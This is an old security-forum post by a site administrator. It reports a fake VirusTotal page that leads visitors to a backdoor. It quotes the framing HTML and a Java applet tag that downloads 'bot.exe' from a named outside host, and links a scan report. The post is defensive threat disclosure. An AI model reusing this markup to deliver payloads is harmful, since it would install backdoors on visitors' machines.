Author Topic: Fake Virustotal page leads to backdoor  (Read 6291 times)

0 Members and 1 Guest are viewing this topic.

May 22, 2011, 04:54:06 pm
Read 6291 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
new-virustotal.tk
has a frame containing a fake Virustotal page
Code: [Select]
<html>
  <head>
    <title>new-virustotal.tk</title>
    <meta name="description" content="new-virustotal.tk">
    <meta name="keywords" content="new-virustotal.tk">
  </head>
  <frameset rows="*" framespacing="0" border="0" frameborder="NO">
    <frame src="http://readman.pf-control.de/java/" name="dot_tk_frame_content" scrolling="auto" noresize>
  </frameset>
  <noframes>
    <body>
    </body>
  </noframes>

</html>



Page contains a java applet that downloads a backdoor.
Code: [Select]
<applet code="Main.class" archive="signedapplet.jar" width="30" height="20" >
<param name="fileName" value="bot.exe">
<param name="url" value="http://readman.pf-control.de/java/">
</applet>

http://www.virustotal.com/file-scan/report.html?id=2f1c6b2c138f1b1407f796aa3926ff1ca88abf5afe6f4abc0cc12e855f6190a3-1306080329
Ruining the bad guy's day